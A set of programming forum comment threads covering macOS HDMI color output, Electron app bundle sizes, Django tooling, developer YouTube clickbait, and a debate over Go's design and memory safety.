My current axe to grind: on M-series Macs, when I plug a monitor in via HDMI, it uses YCbCr instead of RGB, giving the monitor this pervasive hazy tint that is perceptible even with Night Shift on.
I have to use BetterDisplay to force it to RGB every time I connect to the monitor. This should be something I can set on a per-monitor basis.
Unfortunately I can’t use DisplayPort because my Caldigit TS3 Plus seems to have difficulty passing DP1.2 signals over when variable refresh rates are selected. And guess what macOS likes to default to there, as well?
I believe it defaults to Y′CbCr only when a 10 bpc mode becomes available thanks to it, even if this means dropping down to 4:2:2 subsampling. Because 10 > 8 of course.
This happens because of bandwidth restrictions and because RGB (or Y′CbC 4:4:4) uses 3xN bpp and 4:2:2 uses 2xN bpp. So 20 bpp < 24 bpp and it’s “10-bit” so macos considers it a win-win.
Thank you for pointing out BetterDisplay. I thought that’s just how HDMI displays looked on M–Series Macs under MacOS.
It will join the rest of the applications I have to use to make MacOS usable. (AutoRaise, Caffeine, MiddleClick, RDM, Rectangle, SaneSideButtons/SensibleSideButtons)
Can’t forget how each app has its own updater, and that those updaters will steal focus or at least have the anxiety-inducing bounce animation. (How does macOS not have focus stealing prevention?)
The bounce can be disabled in accessibility settings. Also AutoRaise can prevent focus stealing by forcing the window that the mouse is over to remain focused. But ideally auto-updaters and add-on apps would not be required, but that’s why I use linux outside of work.
Fascinating, I have 2 different models of 27” Dells, one via HDMI and one via HDMI in a small USB-C dock.
Both seem to be YCbCr (according to their OSDs) and I haven’t noticed anything wrong. I suppose they wouldn’t switch when I have them on the other computer, but it’s mDP and… not sure, DP probably
I have to use BetterDisplay to force it to RGB every time I connect to the monitor.
What drove me away during last foray into the macOS ecosystem was the beginnings of this trend. I had last used then-still-named OS X during Snow Leopard and Lion, and when I gave it a go in 2014 (I think Yosemite?), I found a bunch of my standard setup tweaks and tasks were no longer available unless you paid for some extra app store tool.
A bunch of my personal preferences went from being configurable options in a menu, to being hidden settings you could only enable via CLI, to requiring a third-party app I needed to install (and often to pay for). I am sad to hear that the trend has not abated.
Claude is still my default, but if I have a problem that might benefit from “reasoning” about it - things like debugging a complex bug caused by code across multiple different files - I’ll try o1 or R2 and see if they can spot something that Claude doesn’t.
Slightly longer: the post asserts 4 main points. The author fails to adequately defend any of them. I feel that that the 3 main points he tries to defend all fail. I feel all 4 objections are valid and disagree with all of his attempted defences.
This is the attitude that enables enshittification: “most users” will keep using our product despite us degrading the experience.
The dev version of this: “$POPULAR_FRAMEWORK is popular, and it must be popular because it is good, therefore $POPULAR_FRAMEWORK is good.” If you lack the imagination to see literally any other way to implement it, the experience of using something else, or lack the ability to assess the tradeoffs, it is easy to fall into this trap. It is much cognitively cheaper to outsource the hard work of critically evaluating technology to other people. The problem arises when most everyone does the same thing, creating a closed system that stalls out at local maxima. (cough)
Think about the prevailing assessment that static types were worthless boilerplate that dominated the web discourse in the early 2010s. And then TS flipped that opinion around, where people swear by static types now. That collective everyone changed their mind, which was good. But it should also instill doubt in those paying attention whether that collective everyone’s takes are as infallible as they purport to be.
I totally agree. Specifically, people arguing over bundle size is ridiculous when compared to the amount of data we stream on a daily basis. People complain that a website requires 10mb of JS to run but ignore the GBs in python libs required to run an LLM – and that’s ignoring the model weights themselves.
There’s a reason why Electron continues to dominate modern desktop apps and it’s pride that is clouding our collective judgement.
As someone who complains about Electron bundle size, I don’t think the argument of how much data we stream makes sense.
My ISP doesn’t impose a data cap—I’m not worried about the download size. However, my disk does have a fixed capacity.
Take the Element desktop app (which uses Electron) for example; on macOS the bundle is 600 MB. That is insane. There is no reason a chat app needs to be that large, and to add insult to injury, the UX and performance is far worse than if it were a native client or a Qt-based application.
Take the Element desktop app (which uses Electron) for example; on macOS the bundle is 600 MB. That is insane. There is no reason a chat app needs to be that large, and to add insult to injury, the UX and performance is far worse than if it were a native client or a Qt-based application.
Is it because it uses Electron that the bundle size is so large? Or could it be due to the developer not taking any care with the bundle size?
Offhand I think a copy of Electron or CEF is about ~120-150MB in 2025, so the whole bundle being 600MB isn’t entirely explained by just the presence of that.
Hm. I may be looking at a compressed number? My source for this is that when the five or so different Electron-or-CEF based apps that I use on Windows update themselves regularly, each of them does a suspiciously similar 120MB-150MB download each time.
I don’t think the streaming data comparison makes sense. I don’t like giant electron bundles because they take up valuable disk space. No matter how much I stream my disk utilisation remains roughly the same.
Interesting, I don’t think I’ve ever heard this complaint before. I’m curious, why is physical disk space a problem for you?
Also “giant” at 100mb is a surprising claim but I’m used to games that reach 100gb+. That feels giant to me so we are orders of magnitude different on our definitions.
Also, the problem of disk space and memory capacity becomes worse when we consider the recent trend of non-upgradable/non-expandable disk and memory in laptops. Then the money really counts.
Modern software dev tooling seems to devolve to copies of copies of things (Docker, Electron) in the name of standardizing and streamlining the dev process. This is a good goal, but, hope you shelled out for the 1TB SSD!
I believe @Loup-Vaillant was referring to 3D eye candy, which I think you know is different from the Electron eye candy people are referring to in other threads.
A primary purpose of games is often to show eye candy. In other words, sure games use more disk space, but the ratio of disk space actually used / disk space inherently required by the problem space is dramatically lower in games than in Electron apps. Context matters.
I care because my phone has limited storage. I’m at a point where I can’t install more apps because they’re so unnecessarily huge. When apps take up more space than personal files… it really does suck.
And many phones don’t have expandable storage via sdcard either, so it’s eWaste to upgrade. And some builds of Android don’t allow apps to be installed on external storage either.
Native libraries amortize this storage cost via sharing, and it still matters today.
Does Electron run on phones? I had no idea, and I can’t find much on their site except info about submitting to the MacOS app store, which is different to the iOS app store.
Well, Electron doesn’t run on your phone, and Apple doesn’t let apps ship custom browser engines even if they did. Native phone apps are still frequently 100mb+ using the native system libraries.
It’s not Electron but often React Native, and other Web based frameworks.
There’s definitely some bloated native apps, but the minimum size is usually larger for the web based ones. Just shipping code as text, even if minified,is a lot of overhead.
Offhand I think React Native’s overhead for a “Hello world” app is about 4MB on iOS and about 10MB on Android, though you have to turn on some build system features for Android or you’ll see a ~25MB apk.
Just shipping code as text, even if minified,is a lot of overhead.
I am not convinced of this in either direction. Can you cite anything, please? My recollection is uncertain but I think I’ve seen adding a line of source code to a C program produce object code which was bigger by more bytes than the size of the source code line was bigger. And C is a PL which tends towards small object code size, and that’s without gzipping the source code or anything.
I don’t have numbers but I believe on average machine code has higher information density than the textual representation, even if you minify that text.
So if you take a C program and compile it, generally the binary is smaller than the total text it is generated from. Again, I didn’t measure anything, but knowing a bit about how instructions are encoded makes this seem obvious to me. Optimizations can come into play, but I doubt it would change the outcome on average.
I’ve seen adding a line of source code to a C program produce object code which was bigger by more bytes than the size of the source code line was bigger
That’s different to what I’m claiming. I’d wager that change caused more machine code to be generated because before some of the text wasn’t used in the final program, i.e. was dead code or not included.
Installed web apps don’t generally ship their code compressed AFAIK, that’s more when streaming them over the network, so I don’t think it’s really relevant for bundle size.
Installed web apps don’t generally ship their code compressed AFAIK, that’s more when streaming them over the network, so I don’t think it’s really relevant for bundle size.
IPA and APK files are both zip archives. I’m not certain about iOS but installed apps are stored compressed on Android phones.
I’m not sure about APK, but IPAs are only used for distribution and are unpacked on install. Basically like a .deb DMG on macOS.
So AFAIK, it’s not relevant for disk space.
FWIW phone apps that embed HTML are using WebView (Android) or WKWebView (iOS). They are using the system web renderer. I don’t think anyone (except Firefox for Android) is bundling their own copy of a browser engine because I think it’s economically infeasible.
Funnily enough, there’s a level of speculation that one of the cited examples (Call of Duty games) is large specifically to make storage crunch a thing. You already play Call of Duty, so you want to delete our 300GB game and then have to download it again later to play other games?
Don’t choose based on hype, choose based on your project requirements and the kind of skills you want to develop over time.
Learn Django and FastAPI. Also, learn three more. Learn that weird new thing that your friend at work keeps mentioning, and learn the up-and-comer you’ve seen make headlines each week. You don’t need to become an expert in all of them, but you can only make the choice “based on your project requirements” if you know what the options are at decision time.
One tool is a screwdriver and one is a can opener. Learn both.
This mentality works if you have a lot of free time. I think you should learn a thing deeply first before just spreading yourself like butter on a freshly toasted bagel. Otherwise you’re just noticing surface level differences and not differences in architectures and design decisions.
Learning one thing well is worth it. Once you start hating some of its decisions, you can try something else, and find that you hate it for different decisions it made. :)
It “bothers” me a bit that alternatives to the Django admin are so scarce.
Also, because SPAs have a huge mindshare, most of the interesting work is happening in that space. Traditional server-side rendered apps, while having some resurgence thanks to HTMX and similar frameworks… well, there are established players, but it doesn’t feel like there’s much innovation. Perhaps traditional frameworks are stable and don’t really need more than slow evolution.
And the rift is a huge issue. I see there’s stuff to build using server-side rendering, but despite I don’t like SPA development, there’s plenty of stuff that is better as an SPA! (And we also lack more competition in Electron-style apps!)
Myself, when I look at FastAPI, I like it a lot. But most things I want to do, in my head they fit better server-side rendering better and I kinda always need something like the admin, so I still turn to Django frequently.
There’s something fundamental in the difference between a frontend dev who needs a backend and a backend dev who needs a SSR UI, and you see it reflected in the frameworks.
Frontend-oriented frameworks put most of their skill points in making sure that frontend dev is cozy, often with really nice live reloading via Vite. Full-stack frameworks say, “here’s a templating language.” Frontend frameworks say, “here’s the bare minimum needed to handle a web request.” Some full-stack frameworks get deep into the weeds with domain modeling and let you elegantly model a domain far beyond simple HTTP handlers. The worst situation to be in is when you can appreciate what both worlds offer you, as very few options exist that give you all the benefits here.
Personally, I do UI dev in Astro with the hyper fast hot reload, and move it over to templates for SSR. Domain modeling is too important to give up for me. I find I lose a lot of time trying to recreate things that you get for free in full stack frameworks.
But there’s a real opportunity for someone to cross the streams here. It’d probably have to be in TS, which isn’t my favorite language, or someone can figure out how to use React/Vue/Svelte components for SSR rendering.
Myself, when I look at FastAPI, I like it a lot. But most things I want to do, in my head they fit better server-side rendering better and I kinda always need something like the admin, so I still turn to Django frequently.
You might be interested in django-ninja. It feels more like FastAPI than DRF does, uses pydantic, and lets you keep the batteries you like (including admin).
It sounds like we might do similar things, then. I rarely need an API; when I do it’s just for one or two things, not for all of my UI.
I’ve used HTMX regularly for a little while now, including in production. In my production use of it, I used django-template-partials, and it’s pretty nice. I’ve been experimenting with cotton in some prototyping, and think I’ll probably use that in the future where I’m currently using template partials.
I worked through the hypermedia systems book using django and HTMX in public, and found the exercise extremely useful. I wrote about my work here. The nice thing is that the workflow for something enhanced with HTMX is so similar to the plain-old-templates I’m used to.
For exploratory programming, I have recently tried out NanoDjango a few times, and I really like it. It lets me keep all the admin goodness I like about django but really lowers the impedence for trying something out quickly. And its “convert” command turns things into a normal django project if I decide they need to have a longer useful life.
When you mentioned that you liked the look of FastAPI, I was thinking about the API part. But NanoDjango gets at that low-impedance feeling for starting a project.
Huh, NanoDjango looks intriguing, I’ll look at it, thanks.
The last times I’ve dabbled with Django I had a few goes at trying to make the first steps experience a bit smoother; like incorporate dj-django-url, uv, and a few other odds and ends that end up being boilerplate-ish for having an easy-to-deploy, smooth initial setup. Likely there’s a million other better approaches out there with more polish, but… it’s how we are.
The Django admin is a rapid CRUD framework with (primitive) change tracking and some authorization support.
This is not only hugely useful, but it even encourages you to store in the database stuff that you would otherwise hardcode in the source code.
It is not perfect by any means, but there’s very few things like it, and for many projects, it puts you one step ahead in productivity.
…
I have certainly switched some stuff to be based in source code and use a Git forge’s support for editing files via a web UI with code review for some purposes, so there’s a small overlap, but still a lot of things I do benefit from the admin.
Case in point; I wrote a small scraper to collect versions from upstream projects and their YunoHost package. I use a Django admin to maintain scraping exceptions. It’s great. I could edit a YAML via the forge web UI, or just with my local editor + git, but in this case, it works so much better.
Case in point; I wrote a small scraper to collect versions from upstream projects and their YunoHost package. I use a Django admin to maintain scraping exceptions. It’s great. I could edit a YAML via the forge web UI, or just with my local editor + git, but in this case, it works so much better.
I guess a difference in opinion, I’d prefer something like that to be checked in and linted, or have logic in the app itself to confirm exceptions are valid inputs.
It “bothers” me a bit that alternatives to the Django admin are so scarce.
I was looking for this in Nest and found a project half a decade unmaintained. There was a newfangled Rust framework who had this on their roadmap kinda.
Most people say that given an OpenAPI spec it should be ‘easy’ to create a generic web CRUD editor for it, but nobody seems to be able to be bothered to build one that is usable.
Yes, the most brilliant minds of our generation are ignoring this problem. The “optimist” answer is that you cannot really make CRUD nicer than what it is. (E.g: there’s so much variation that CRUD frameworks will always have narrow use cases.)
I have written two CRUD frameworks. The first one got along quite far, with many sophisticated features, but it had some basic flaws. My second one has a stronger foundation, and indeed it still powers one personal app… but I never had the need to develop more features… so I still rely on Django for most things :(
Coming from Django I can’t emphasise how much of a step down this pile of crap is (but that is the TS/JS culture that this is considered good and popular): https://nestjs.com
The YouTube channel here seems to be a person who needs to be dramatic for view reasons. I think the actual content, and the position of the Ghostty author here on this topic, is pretty mild.
An actual bit from the video:
Guest: “…I don’t know, I’m questioning everything about Go’s place in the stack because […reasonable remarks about design tradeoffs…]”
Host: “I love that you not only did you just wreck Go […]”
Aside… In the new year I’ve started reflexively marking videos from channels I follow as “not interested” when the title is clickbait, versus a succinct synopsis of what the video is about. I feel like clickbait and sensationalism on YouTube is out of control, even among my somewhat curated list of subscribed channels.
This is why I can’t stand almost any developer content on YouTube and similar platforms. They’re way too surface-level, weirdly obsessed with the inane horse race of finding the “best” developer tooling, and clickbait-y to a laughable degree. I have >20 years of experience, I’m not interested in watching someone blather on about why Go sucks when you could spend that time on talking about the actual craft of building things.
But, no, instead we get an avalanche of beginner-level content that lacks any sort of seriousness.
This is why I really like the “Developer Voices” channel. Great host, calm and knowledgeable. Interesting guests and topics. Check it out if you don’t know it yet.
I’m in a similar boat. Have you found any decent channels that aren’t noob splooge? Sometimes I’ll watch Asahi Lina, but I haven’t found anything else that’s about getting stuff done. Also, non-OS topics would be nice additions as well.
7 (7!) Years ago LTT made a video about why their thumbnails are so… off putting and it essentially boiled down to “don’t hate the player; hate the game”. YouTube rewards that kind of content. There’s a reason why nearly every popular video these days is some variant of “I spent 50 HOURS writing C++” with the thumbnail having a guy throwing up. If your livelihood depends on YouTube, you’re leaving money on the table by not doing that.
It’s not just “Youtube rewards it”, it’s that viewers support it. It’s a tiny, vocal minority of people who reject those thumbnails. The vaaaaast majority of viewers see them and click.
I don’t think you can make a definitive statement either way because YouTube has its thumb on the scales. Their algorithm boosts videos on factors other than just viewer click through or retention rates (this has also been a source of many superstitions held by YouTubers in the past) and the way the thumbnail, title and content metas have evolved make me skeptical that viewers as a whole support it.
What is the alternative? That they look at the image and go “does this person make a dumb face” ? Or like “there’s lots of colors” ? I think the simplest explanation is that people click on the videos a lot.
…or it’s just that both negative and positive are tiny slices compared to neutrals but the negative is slightly smaller than the positive.
(I use thumbnails and titles to evaluate whether to block a channel for being too clickbait-y or I’d use DeArrow to get rid of the annoyance on the “necessary evil”-level ones.)
I am quite happy to differ in opinion to someone who says ‘great content’ unironically. Anyway your response is obviously a straw man, I’m not telling Chopin to stop composing for a living.
Your personal distaste for modern culture does not make it any higher or lower than Chopin, nor does it invalidate the fact that the people who make it have every right to make a living off of it.
They literally don’t have a right to make a living from Youtube, this is exactly the problem. Youtube can pull the plug and demonetise them at any second and on the slightest whim, and they have absolutely no recourse. This is why relying on it to make a living is a poor choice. You couldn’t be more diametrically wrong if you tried. You have also once again made a straw man with the nonsense you invented about what I think about modern culture.
How’s that any different from the state of the media industry at any point in history? People have lost their careers for any reason in the past. Even if you consider tech or any other field, you’re always building a career on top of something else. YouTube has done more to let anyone make a living off content than any other stage in history, saying you’re choosing poorly to make videos for YouTube is stupid.
You have also once again made a straw man with the nonsense you invented about what I think about modern culture
You’re the one who brought it up:
I am quite happy to differ in opinion to someone who says ‘great content’ unironically
Isn’t this kind of a rigid take? Why is depending on youtube a poor choice? For a lot of people, I would assume it’s that or working at a fast-food restaurant.
Whether that’s a good long-term strategy, or a benefit to humanity is a different discussion, but it doesn’t have to necessarily be a poor choice.
Not really?
I mean sure if you’ve got like 1000 views a video then maybe your livelihood depending on YouTube is a poor choice.
There’s other factors that come into this, but if you’ve got millions of views and you’ve got sponsors you do ad-reads for money/affiliate links then maybe you’ll be making enough to actually “choose” YouTube as your main source of income without it being a poor choice (and it takes a lot of effort to reach that point in the first place).
We’ve been seeing this more and more. You can, and people definitely do, make careers out of YouTube and “playing the game” is essential to that.
Heh - I had guessed who the host would be based on your comment before I even checked. He’s very much a Content Creator (with all the pandering and engagement-hacking that implies). Best avoided.
Your “ghostty author” literally built a multibillion dollar company writing Go for over a decade, so Im pretty sure his opinion is not a random internet hot take.
Yup. He was generally complimentary of Go in the interview. He just doesn’t want to use it or look at it at this point in his life. Since the Lobsters community has quite an anomalous Go skew, I’m not surprised that this lack of positivity about Go would be automatically unpopular here.
And of course the title was click-baity – but can we expect from an ad-revenue-driven talk show?
I was able to get the incremental re-builds down to 3-5 seconds on a 20kloc project with a fat stack of dependencies which has been good enough given most of that is link time for a native binary and a wasm payload. cargo check via rust-analyzer in my editor is faster and does enough for my interactive workflow most of the time.
Don’t be a drama queen ;-) You can, all you want. That’s what most people do.
The host actually really likes Go, and so does the guest. He built an entire company where Go was the primary (only?) language used. It is only natural to ask him why he picked Zig over Go for creating Ghostty, and it is only natural that the answer will contrast the two.
Still rocking an iPhone 12 mini. The modern web can be pretty brutal on it at times: pages crashing, browser freezing for 10s at a time. It has honestly curtailed my web use on the go significantly, so I’m mostly okay with it on the whole.
Most things I absolutely need I can get an app for that will run better usually. The only real issue is the small screen size is obviously not being designed for anymore, and that’s becoming more of an issue.
I didn’t realize how many apps were essentially web applications until I enabled iOS lockdown mode. Suddenly I was having to add exceptions left and right for chat apps, my notes app, my Bible app, etc.
But even web-powered apps do seem snappier than most websites. Maybe they’re loading less advertising/analytics code on the fly?
Most things I absolutely need I can get an app for that will run better usually. The only real issue is the small screen size is obviously not being designed for anymore, and that’s becoming more of an issue.
I’m on a 2022 iPhone SE, and feel the same way. (My screen may be a bit smaller than yours?) The device is plenty fast, but it’s becoming increasingly clear that neither web designers nor app developers test much if at all on the screen size, and it can be impossible to access important controls.
TBH, I would cheerfully carry a flip phone with the ability to let other devices tether to it for data connectivity. Almost any time I really carry about using the web, I have a tablet or a laptop in a bag nearby. A thing that I could talk on as needed and that could supply GPS and data to another thing in my bag would really be a sweet spot for me.
That is exactly the kind of thing I’d like. I’d probably need to wait for the 5G version, given the 4G signal strength in a few of the places I tend to use data.
In the most charitable interpretation, it’s only a restatement of something from the article:
Elsewhere Pike talks about the thousands of engineers he was targeting, in his usual modest, subtle way:
The key point here is our programmers are Googlers, they’re not researchers. They’re not capable of understanding a brilliant language.
So you could even argue that “Go being great if you’re an amateur with no taste” was an explicit design goal, and perhaps we should ask Rob Pike to be better.
Ah, the good “everyone who disagrees is dumb and uncivilized” argument.
As we all know that Pike, Thompson, Griesemer, Cox, et al have no idea of what they’re doing.[/irony]
It’s fine to disagree on things, have different opinions and criticism. Heck, that’s how people decide what language they wanna use. But the reason there are more than a hand full of languages with different designs is probably not that everyone else is dumber than you.
And should “amateur” in fact not be meant as an insult, then the argument essentially becomes “to use zig you have to be smart, and not make mistakes” which judging by your other comments regarding doesn’t seem to your opinion either.
Trying to give you the benefit of the doubt here, since other than me personally not liking certain design choices I think Zig seems like a great project overall.
Ah, the good “everyone who disagrees is dumb and uncivilized” argument.
Go was explicitly designed for fresh university graduates at google, thus, amateurs. And as Pike himself says, quoted in the linked article, for people with no taste (“They’re not capable of understanding a brilliant language”). Andrew’s assessment is completely fair.
That Pike quote has been used as a stick to beat him with since 2012. I have a note about it.
It’s from a talk, so likely extemporised.
Here’s the full quote:
The key point here is our programmers are Googlers, they’re not researchers. They’re typically, fairly young, fresh out of school, probably learned Java, maybe learned C or C++, probably learned Python. They’re not capable of understanding a brilliant language but we want to use them to build good software. So, the language that we give them has to be easy for them to understand and easy to adopt.
It must be familiar, roughly C-like. Programmers working at Google are early in their careers and are most familiar with procedural languages, particularly from the C family. The need to get programmers productive quickly in a new language means that the language cannot be too radical.
I think it’s pejorative to state that recent CS graduates who have started working at Google before 2012 “have no taste”. No experience at writing production software at scale, sure. But software development is so much more than language.
I haven’t watched the talk, so I don’t know if the term “brilliant language” is used semi-ironically. Neither C, Java, nor COBOL for that matter are considered “brilliant”, but they have been used to write a lot of software. There’s a law of large numbers in play when it comes to writing software at scale which means that you neccesarily have to cater to the lowest common denominator of developers, which even at Google at its prime was probably lower than the average commenter here ;)
I am fully in agreement that Golang was probably a great fit for Google, and maybe still is. Its popularity outside Google is probably due to good marketing, “if we copy Google we too will succeed”, and a genuine demand for a “C-like with garbage collection and concurrency”.
For outside Google use, that last part “C-like with garbage collection” is I suggest a big part of its appeal. If one is already aware of how to write reasonable C, it is a useful mechanism to have, and less risky for small to medium sized companies than depending upon D.
If one has folks who are familiar with C, and have a problem to tackle which does not not require manual memory management, nor the tricky performance things C is often used for, then it seems an obvious option. Without dragging in a lot of the pitfalls of C++, or complexities of other languages. I’ve occasionally proposed it in such cases.
I have actually chosen to use Go for one project, specifically because of its good CSP support, as the problem domain lend itself to such a design approach. However one had to be aware to avoid certain risks: lack of immutable pointers for sends over channels, ensuring one nil’ed a pointer after sending (moving ownership), being wary of sending structs containing slices, avoiding accidental mutable captures in spawning goroutines from interior functions, etc.
Despite that it was still the easiest approach to sharing work on said program with others not familiar with the CSP approach. In many ways one can view Go as the Alef with a GC which Pike wanted Winterbottom to make, for CSP tasks it reasonably serves in that role. However it would (IMHO) be better if it had a few more of the issues I mention above addressed; that’ll have to wait for some future language.
As to general concurrency, I’ve seen a lot of Go written in a threads + mutex protecting structs style which one often sees in C and C++, so I suspect most people are not taking the effort to analyse in the CSP style, or more likely are simply unaware of it.
My point is that constantly quoting a 12 year old remark as an anti-golang trope is lazy and borderline intellectually dishonest.
I think Rob Pike knows more about Google’s workforce than most of his detractors do - and that hiring a bright young person directly from university does not give you a seasoned software developer. I also believe that an appreciation for “brilliant languages” in relation to software development is something that is developed over time, at which time the person hired by Google is probably doing something more valuable to the company bottom line than writing code.
I don’t think it’s intellectually dishonest to bring up a rude and dismissive quote from one of the designers of golang stating that golang is a dumbed-down language because its target userbase is too stupid to understand a better language.
I disagree. Disliking a language because it has multiple technical issues, like others have pointed out in this thread and others, is defensible. Disliking it because its creator said something inappropriate is not.
Even the most generous reading I can muster for Pike’s infamous remarks is something like “we want new graduates with limited breadth and depth of experience to be able to make productive contributions without having to learn a lot of new stuff.” I think the criticism of Go that is pegged to Pike’s remarks is not dislike because of what he said, it’s that its deficiencies exist in part because of the design goals these remarks lay bare. The remarks provide evidence that Go’s design was targeted at novices (“amateurs with no taste”, if you like) from whom economic productivity is expected immediately, rather than professionals with an unbounded capacity for learning and independent interest in doing excellent work.
Maybe. I still think a bunch of nerds got really angry at Pike because they didn’t get jobs at Google back in the day despite being fluent in Haskell, and they will never forget nor forgive.
I have another reason to think Pike’s quote is unattractive: it’s devious rhetoric.
He indirectly acknowledges that Go lacks a bunch of good features, fair enough. But then he insinuates that that is because those features are hard to understand (require devs “capable of understanding a brilliant language”). That is wrong on the facts, at least in the case of sum types. It is also rude: he uses the word “brilliant” as a synonym for ‘hard to understand’. That is a ‘back-handed compliment’, which is another word for ‘insult’ in the brilliant English language ;-) .
As for its relevance to Go: sure, the quote is not enough to condemn Go. But it suggests the big mistake (nil) that Go’s designers did, in fact, go on to make. Which is why there is so much cause to quote it.
The context here is about how Go was designed. A quote from the creator of the language about how it was designed at a time when it was designed seems like the most appropriate thing possible to bring up.
I agree with your second paragraph, but I see no relation to the first one. The language was designed in a certain way for certain reasons. If that was yesterday or 12 years ago does not really matter when looking at the lifecycle of the typical programming language.
Even within Google, Java is significantly bigger/more used than Go, and frankly, I don’t see much difference in their design goals. I would even say that Java is a better “Go” than Go itself - it has better concurrency primitives, now has virtual threads, very simple language with utmost care for backwards compatibility. And it is already over its growing pains (which one would think go could have easily avoided by learning from these..) - it is expressive, but not in the “redefine true to false” kind of dangerous way, has good enough generics, etc.
Also, all that development into Java’s GCs can really turn the tables in a naive performance comparison - sure, value types can make the life of the Go GC easier, but depending on workload it may not be enough to offset something like the beast G1GC is - especially in server environments where RAM is plentiful (and often have to be plentiful).
Hmm, that’s odd. Your note almost literally quotes [a Hacker News comment]((https://news.ycombinator.com/item?id=18564643), right down to the truncated link text ending in ...; but the second link was introduced with the crucial words “And there are other hints on”, and those are missing.
Go was explicitly designed for fresh university graduates at google
What does “explicitly designed” mean in this context? This feels a lot like saying Python has explicitly designed as a teaching language and C explicitly for Unix, etc.
Also I’d argue that Go - despite Google - is a lot more in the tradition of Limbo, Alef and Newsqueak.
Google plus university students sounds a lot more than Python and Java, languages already used a lot by Google.
Anyways, let’s stick to the criticism. Let’s take Limbo. Limbo is rather close to Go. Just quite a bit more niche for many reasons. However to the best of my knowledge it wasn’t “explicitly designed for fresh university graduates”, certainly not at Google which didn’t exist at the time.
Is that also a language for amateurs with no taste?
I mostly ask, because the specific context “people working at Google” under which it was created seems to be overly present in the argument, yet we talk about it largely as people who didn’t work at Google. Also Go is largely used by amateurs (compared to Python, JavaScript, etc.) seems at least debatable.
And to be clear: I hate the fact that Google seemingly at some point decided to exert a lot more control. Honestly, I even dislike the fact that Go was created at Google. The main reason I got interested in the language originally was that I tend to like software designed by the Plan 9 crowd. The fact that it was less niche - and that’s Google’s “fault” - as well as promised stability in a time where programming languages seem to largely designed like fashion, where one just adds what’s currently on-vogue piling up “old ways of doing things” until enough cruft is accumulated for everyone to leave the sinking ship of “sounds good on paper” ideas and code bases where you can tell when they were written depending on which feature was new and hip at the time. See Java’s OO features, JavaScript’s million ways to write simple loops. Pike’s talks on how Go is essentially finished, with only generics remaining[1] and focus shifting to libraries, compiler, GC, etc. seemingly confirmed that. Then Pike got quiet and Google replaced the Go website with a heavily Google branded one.
So in that sense I get where things come from. However, if you look at Go it’s also a clear next step from previous languages in the spirit of Alef, Newsqueak and Limbo. Channels exist in all of them and might be the thing that was copied the most. So that “awful, buggy concurrency primitive” has a history going back to the 80s and Go is currently the reason it’s been copied so much into other languages.
fresh university graduates at google, thus, amateurs
Why not say that then?
Wikipedia on amateur:
An amateur is generally considered a person who pursues an avocation independent from their source of income. Amateurs and their pursuits are also described as popular, informal, self-taught, user-generated, DIY, and hobbyist.
Someone who formally studied something for three years seems like a stretch. But even then, that disregards the reality of Go usage completely.
Andrew’s assessment is completely fair.
I don’t see how “having no taste” is “a fair assessment”.
go is great if you are an amateur with no taste, like 99% of google employees.
Neither says “Go was designed for” nor “fresh university graduates”. And google employees in this sentence sounds more like an example of people who are amateurs with no taste. But even if not, I don’t see how this can be interpreted in a nice/factual without losing any meaning. Let’s say Go was designed for Google employees. How is that different from Python being designed for teaching and other such things, and what does it say about the language? Is that a criticism? Why would one not want an easy to understand language?
If it’s just about it being technically correct (which seems like a stretch as described above) then what’s the thing the sentence wants to convey? In the context I’d expect it to be a criticism.
[1] look it up, their website mentioned they’d add them from pre 1.0 days and that statement only was changed after they added them. Just to counter the wrong trope of “they finally convinced them”.
As we all know that Pike, Thompson, Griesemer, Cox, et al have no idea of what they’re doing.
I feel like this is sort-of correct. They are all quite competent, but I don’t think any of them have good ideas when it comes to language design. On the other hand I don’t think I say that I agree with Andrew on language design, since I find Zig a bit Goish. There’s a lot of skill behind it and its ideas are being executed well, I just think the ideas come together into something that I feel isn’t particularly good. Obviously quite a few people like Zig and are creating great stuff with it, but the same is true of Go.
As someone who is fairly content with go (mostly due to disillusionment with everything, certainly including go), and who hasn’t used zig, can you explain to me what you don’t like about zig and how it all comes together?
Depends on your definition of “discipline” in a language. Go loses points for: nil pointers, slice/map/channel footguns, no enums/sum types. It gains points for some type safety, memory safety, first-class testing and benchmarking tooling.
I’m not familiar with Erlang but no data races is a clear advantage over Go’s approach to concurrency. Rust is probably the most disciplined language for my own definition of disciplined (too disciplined for some domains like game dev).
Go should only receive partial credit for memory safety. Most sources of memory unsafety are not present in Go, but since data races can result in memory unsafety in Go, it cannot be said to be a memory safe language. There are two approaches to fixing this: the Java way, which is to make it so that data races can’t result in memory unsafety, and the Rust way, which is to make it so that data races can’t happen.
It seems a fair tradeoff, given it often compiling to smaller and more efficient binaries than C itself.
On the other hand, Go not being memory safe with its choice of tradeoffs (middle of the pack performance with the productivity of a GC) is a very sad fact of life. (It can Segfault on race conditions, while similar languages, like java, might corrupt a given object, but that will still be well-defined java code and the runtime can just chug along).
Surely segfaulting, crashing the process, and restarting it is preferable to continuing with some internal object in an invalid/corrupt/wrong state? Not that Go is guaranteed to crash for a data race updating a map.
The former fixes the problem, the latter allows it to continue to propagate.
Segfaulting is the happy case, but it’s up to the OS to detect, not Go (more or less).
What’s much more likely is that it silently corrupts either the user’s application state, or even worse, the runtime’s state, which can yield a completely unexpected error down the line which will be impossible to debug.
But that also seems to be the implication of the java case where you wrote ‘might corrupt a given object’. So the program can still suffer knock on errors of an essentially non-deterministic nature. Just because the runtime is still valid, does not imply that the overall program is.
In Java the object you racily accessed might get into a bad state you didn’t want to get it into, but in Go, you might write into some random other object that had nothing to do with what you were accessing. It’s plain old UB that can result in pretty much anything you can think of.
The scope to which such an error can propagate is way different.
If I open a new thread and create a list with a few objects, they will 100% work in Java’s case. You can’t say the same for Go, as a hidden corruption of the runtime can rear its ugly head anywhere.
Preach. What reinforces this is the awful discourse around software dev.
Advocates for $CURRENT_TECH take most of the oxygen in the room, so toxic positivity is taken to be normative. Software design is often denigrated in favor of duct-taping more libraries together, as people love to advertise that they worship at the altar of Business Value exclusively. Most any design/testing philosophy is usually seen as “too hard,” despite bug counts being where they are. Devs regard make-work like keeping up with tiny, breaking package updates as equivalent to actually delivering value.
It’s like it’s a big social game where the objective is pretend to care less about craft and instead signal properly that you are in the group of software developers.
I feel like we live in a tech dystopia and I’m mad about it.
As I watch the city burn around me, it’s hard not to feel that way too.
Arguably it’s mainly societal pressures that create this incentive structure, however, the widespread use of a programming language as undisciplined as Go certainly factors into it.
I think it’s societal pressures that cause the incentive structure. However, I do think that there is an insidious path dependence that cements a worse is better attitude: you start with buggy software, you try to make something more better, people take a chance, it fails, and people assume that nothing better can happen so they don’t invest in better software. Progress is slow and requires risk.
